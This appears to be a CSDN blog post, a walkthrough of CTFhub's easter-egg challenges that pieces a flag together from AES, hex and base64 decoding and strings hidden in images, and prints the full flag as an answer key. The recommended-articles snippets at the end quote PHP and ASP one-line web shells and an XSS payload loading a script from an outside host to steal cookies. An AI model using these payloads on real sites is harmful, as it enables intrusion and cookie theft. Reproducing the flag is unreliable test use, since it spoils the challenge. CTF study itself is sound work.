CTFhub平台题解(技能树 彩蛋部分)二

最新推荐文章于 2024-05-14 19:11:32 发布
最新推荐文章于 2024-05-14 19:11:32 发布
阅读量870 收藏 1
点赞数 2
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43896279/article/details/104702650
版权

继上次彩蛋部分陷入困惑

在一位大佬指点下 有了头绪

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L77xiFC2-1583494498401)(E6C6D77B3F6987F4E79E57A7E3CE63CE.jpg)]

万分感谢大佬,我在这里给一些朋友提醒

在上文中我们提到了 flag[0:18]

然后flag[42:48]在下载的示例中可以看到经aes加密后的密文

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yiD5XzjT-1583494498403)(QQ截图20200306162542.png)]

然后经过解密我们可以看到flag[42:48]

这里提一下注意把输出格式换成hex 要不然解密不出来

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FJjK11rc-1583494498403)(QQ截图20200306181551.png)]

在题目提交网页里 有这样一个图片

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1G8HRtU6-1583494498403)(QQ截图20200306181210.png)]

我们保存到本地 然后用世界上最好用的记事本打开

可以找到这样一个字符串

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JbV3pYHn-1583494498404)(QQ截图20200306162614.png)]

在wp提交 网页里有这样一个图片

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hxK9Quxh-1583494498404)(QQ截图20200306181243.png)]

同样方法操作 得到一段flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oI2S6qC8-1583494498405)(QQ截图20200306162631.png)]

再次回到题目提交页面,打开网页源码

我们可以找到一串字符

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-M6GYOo0f-1583494498406)(QQ截图20200306181414.png)]

这样一串字符 猜一下应该是十六进制

转成字符 对了 嘿嘿嘿

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yWCdEV91-1583494498406)(QQ截图20200306181429.png)]

在wp提交页面源码里

我们也可以找到一串字符

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NVUo83jZ-1583494498407)(QQ截图20200306181318.png)]

咦~~ 加密方式还不一样

那个=明显提示 就是base64

解密

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rwXiNMz4-1583494498408)(QQ截图20200306181338.png)]

我将收集到信息整理一下

拼接得到flag

flag[0:6] = ctfhub
flag[6:12] = "{029e0"
flag[12:18] = "2eb3a1"
flag[18:24] = "e8c49b"
flag[24:30] = "1132b5"
[30:36] = "15b652"
[36:42] = "a5f3a8"
[42:48]  =  62013}

ctfhub{029e02eb3a1e8c49b1132b515b652a5f3a862013}
zhi_chu
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFHUB学习题解Web(1)- 前置技能(持续更新整理)
独沐晨霖
07-21 2046
注: 1. 因为是个入门题网站,若题目仅涉及简单的基础知识,就不截图了,仅简要说明过程 2. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 3. 大标题为版块名,小标题为含有题目的上级菜单名,无序黑体为题目名 Web HTTP协议 请求方式 众所周知,HTTP的请求方法是可以自定义的,用burp抓个包改一下请求方式为题目要求的CTFHUB就可以了 302重定向 打开网页用F12发现请求会被302重定向回index.html,用burp拦截并send to repeater即可得到fla
CTFhub平台题解技能树 彩蛋部分
weixin_43896279的博客
03-04 3713
CTFhub平台题解技能树 彩蛋部分) 最近ctfhub平台上线了,平台挺好,让我一顿好肝。作为一个菜鸡想写web的writeup,但我做不出来。 只能拿彩蛋部分过过瘾,彩蛋部分脑洞有的真是挺大的,也有几个题相似,闲话不多说,上手。 首页 脑洞还可以:根据提示说在*.ctfhub.com中,但他这个题目名字有点误导人,千万不要直接跑首页翻。前面说应该是在一个子域名中,但具体是啥不太清楚,上网搜...
网络安全最全CTFHUB-web-信息泄漏,2024年最新字节跳动Andorid岗25k+的面试题
最新发布
2401_84252281的博客
05-14 546
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CTFHub题解
qq_52676257的博客
03-09 214
CTFHub题解 文件上传 js前端验证 查看该页面源代码,发现该页面允许上传的文件类型为.jpg,.png,.gif 于是上传一句话木马yjh.jpg,使用Burp Suite进行抓包后,将所上传文件后缀名改为.php,再进行放包 连接中国蚁剑,进行添加数据,就得到了flag 相关知识点 常见一句话木马 常用一句话木马 asp一句话木马: <%execute(request(“value”))%> php一句话木马: <?php @eval($_POST["value"]);?&g
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 783
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 4705
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
电工学题解:第章 正弦交流电路.doc
11-26
电工学题解:第章 正弦交流电路 本资源摘要信息主要围绕电工学题解的第章正弦交流电路展开,涵盖了基本要求、基本概念、基本定律、基本分析方法和交流电路中的功率等方面的知识点。 基本要求 本章的基本要求...
计算机级-计算机级高频Python题+题解.zip
03-04
计算机级_计算机级高频Python题+题解
计算机级-计算机级考试Java语言题集+题解.zip
02-25
计算机级_计算机级考试Java语言题集+题解
西普WEB大部分题解
12-09
西普WEB大部分题解,需要在西普刷题的CTF小伙伴赶紧下载吧
计算机级-计算机级的一些题解-CPP+Java.zip
02-10
计算机级_计算机级的一些题解_CPP+Java
CTFhub彩蛋部分技能树解题
qq_42039946的博客
12-11 4546
一、背景 最近玩CTF,自己在win7下用phpstudy搭建了个DVWA+webug4.0+sqli-labs+upload-labs+pikachu的5合1靶场,但是发现phpstudy设置开机自启后只能是win7系统用户登录后才会运行,系统用户注销后phpstudy程序会自动关闭,每次开靶场都要登录一下,有点麻烦,所以就想实现win7开机后直接自动启动phpstudy,让phpstudy不再依赖系统用户来运行。 、准备工作 1.准备好两个应用程序instsrv....
CTFHUB-web-信息泄漏
XiaoYeZhu_1314的博客
03-16 973
题目所在位置:技能树->web->信息泄漏。
CTFhub彩蛋篇_持续更新
weixin_45633243的博客
11-03 2455
首页 听说在首页的某个地方隐藏了一个flag,可能在*.ctfhub.com中,不妨先找到flag再来开题 http://z.zcjun.com/ - 级域名挖掘 都试一试 然后F12 查找一哈 公众号 在CTFHub微信公众号上签到可获得更多金币。听说在微信公众号上也有个彩蛋,去看看吧 太简单了 就差把彩蛋俩字写在你脸上 据说彩蛋是关键词。是CTFer最喜欢的东西 回复这个关键词就可以拿到 当然是flag啊 题目入口 在某个题目的入口上也有一个哦 在提交fla
CTFHUB解题旅程之web前置技能-HTTP协议
小宇的web博客
05-09 791
CTFHUB解题旅程之WEB前置技能-HTTP协议 1.请求方式 这里有两种办法来获取flag 这里提示请求方式使用CTFHUB的办法来进行flag的获取 第一种办法使用小黑框cmd指令直接获取到了flag 第种办法用bp抓包用重发器repeater来修改请求方式改为CTFHUB 2.302跳转 1.首先了解302状态码是什么,302状态码是页面跳转。根据这个特点找到跳转的页面即可找到flag 首先打开网络这个选项,找到302状态码,然后找到跳转的页面 2.使用bp抓包,发送请求就可以得到flag
CTFHub
weixin_45916569的博客
05-07 620
记一次CTFHub easy_login解题思路 根据题目的页面显示,直接下载一个nodejs文档分析, ,我们可以先找到这样一个页面 然后在尝试读取一下api.js 所以说,现在的思路就是要伪造admin账户登入(修改) authorization下的内容是采用JSON格式,需要进行base64解密,但是构造pyload的时候需要进行base64加密,进行请求。 通过base64解密以上的内容可知,此验证可分为三段,前两段为base64加密后面为hs256,加密前两段base64后的结果和一串密钥第
2021CTF工业信息安全技能大赛(常州站)-协议分析
qq_43264813的博客
08-03 1195
2021CTF工业信息安全技能大赛(常州站)-协议分析 题目内容:工程师采集了某工控系统的通信流量,流量中隐藏着 flag,请尝试找出 flag。提交格式:flag{xxx}。 解题步骤: 1.使用科来分析流量包发现一条非法校验和中存在一条加密字符串 2.字符串疑似凯撒编码,进行解码 FLAG flag{TheFlagIsHere} ...
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2108
ssrf
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3147
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值